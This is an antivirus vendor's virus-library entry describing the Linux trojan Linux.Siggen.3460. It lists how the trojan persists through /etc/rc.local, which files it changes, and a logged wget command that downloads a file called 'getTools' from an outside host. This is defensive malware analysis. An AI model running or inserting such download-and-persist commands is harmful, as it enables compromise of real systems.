FOR CUSTOMERS

Close

My library

+ Add to library

24/7 Tech support | Rules regarding submitting

Send a message

A query form

Call us

+7 (495) 789-45-86

Forum

Your tickets

Total: -
Active: -
Latest: -

New ticket

Call us

+7 (495) 789-45-86

RU CN DE EN ES FR IT JP KZ UZ PL BY

Close

Support services

Scanners

Dr.Web vxCube

Trial

VCI investigations

Virus library

Knowledge base

Technologies

Terminology

Training and education

Myths

Myths about anti-viruses

News

Linux.Siggen.3460

Added to the Dr.Web virus database: 2020-12-01

Virus description added: 2020-12-01

Technical Information

To ensure autorun and distribution:

Creates or modifies the following files:

/etc/rc.local

Malicious functions:

Launches processes:

chmod 755 ./<SAMPLE> ./haloCoreService.pid ./run.sh ./stdout.log
chmod 755 ./sh/*
sh -c wget http://csc.ruijie.com.cn/rcc/web/haloFaq/getTools >/dev/null 2>&1
wget http://csc.ruijie.com.cn/rcc/web/haloFaq/getTools

Performs operations with the file system:

Modifies file access rights:

<SAMPLE_FULL_PATH>
/root/haloCoreService.pid
/root/run.sh

Creates or modifies files:

/var/log/halo_core_service.log
/root/haloCoreService.pid

Deletes files:

/root/halo_core_service.zip
/root/getTools

Network activity:

Establishes connection:

<LOCAL_DNS_SERVER>

HTTP GET requests:

cs#.######.#om.cn/rcc/web/haloFaq/getTools

DNS ASK:

cs#.##ijie.com.cn

Curing recommendations

Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

One month (no registration) or three months (registration and renewal discount)

Download Dr.Web

Download by serial number